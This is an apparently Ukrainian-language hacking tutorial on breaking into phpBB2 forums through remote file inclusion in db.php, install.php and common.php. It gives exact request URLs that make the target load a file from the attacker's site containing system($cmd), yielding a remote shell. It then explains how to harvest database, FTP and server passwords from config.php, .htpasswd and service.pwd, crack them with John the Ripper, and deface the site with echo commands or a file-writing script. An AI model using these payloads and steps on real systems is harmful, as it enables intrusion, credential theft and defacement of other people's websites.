Н-да… Скільки я читав статей на тему про злом через форум PhpBB2, всі схожі, а точніше в них розглядається уразливість в одному і тому ж файлі db.php, який знаходиться в папці includes. Але 99% всіх форумів пропачено. АЛЕ, вразливість є не тільки в цьому файлі, але і в інших. Про db.php я теж розповім. І так приступимо.1) inludes/db.php У ньому є такий рядок include($phpbb_root_path. ‘db/mysql.’.$phpEx); Заливаємо на свій сайт в папку db файл mysql.txt (Зміст файлу: system($cmd);, запит буде таким sitename.com/PhpBB2/includes/db.php?phpbb_root_path=http://имя_твоего_сайта/&dbms=mysql&phpEx=txt&cmd=ls Щодо команд (які пишуться після cmd= читай статтю Никсовые команди). Якщо відображається список файлів переходь до пункту МОЖЛИВОСТІ або ДЕФЕЙС.2) install.php У ньому є такий рядок include($phpbb_root_dir. ‘includes/functions_selects.’.$phpEx); І так заливаємо на свій сайт в папку includes файл functions_selects.р?рСодержание файлу: system($cmd); Пробуємо відкрити sitename.com/PhpBB2/install.php?phpbb_root_dir=http://имя_твоего_сайта/&cmd=ls Якщо відображається список файлів переходь до пункту МОЖЛИВОСТІ або ДЕФЕЙС.3) common.php У ньому є такий рядок include($phpbb_root_path. ‘config.’.$phpEx); Тепер заливаємо на наш сайт файл config.php з таким же змістом functions_selects.php Пробуємо відкрити sitename.com/PhpBB2/common.php?phpbb_root_dir=http://имя_твоего_сайта/&cmd=ls Якщо відображається список файлів переходь до пункту МОЖЛИВОСТІ або ДЕФЕЙС.МОЖЛИВОСТІ. І так, у нас є доступ до командного рядка, зробити можна все що завгодно (якщо прав вистачить). Треба пошукати файли з паролями. Наприклад, у папці форуму PhpBB2 лежить файл config.php у ньому міститься логін, пароль, назва бази даних MySQL, пароль від якої до речі може збігатися з ФТП. Також в кореневій папці сервера, у файлі .htpasswd або в папці _vti_pvt у файлі service.pwd зберігається пас від сервака. John The Ripper в руки і вперед 🙂 ДЕФЕЙС. Дефейс можна зробити по суті трьома способами.1) Є рассшифровали пас від ФТП, це без коментарів.2) Командою echo — cmd=echo ТЕСКСТ_НАДПИСИ > повний шлях до файлу cmd=echo Defaced Over by G > /home/name/public_html/index.html3) Створити скрипт, який буде писати щось у файл.Для цього у файли на нашому сервері (mysql.txt config.php або functions_selects.php) пишемо такий текст:$opnfile=fopen(“/полный_путь_к_дире_сервера/index.html”,«w»);fwrite($opnfile,”
“);
fclose($opnfile);Заливаємо на сервер файли і відкриваємо знову имя_уязвимого_сайта?phpbb_root_dir=http://имя_твоего_сайта/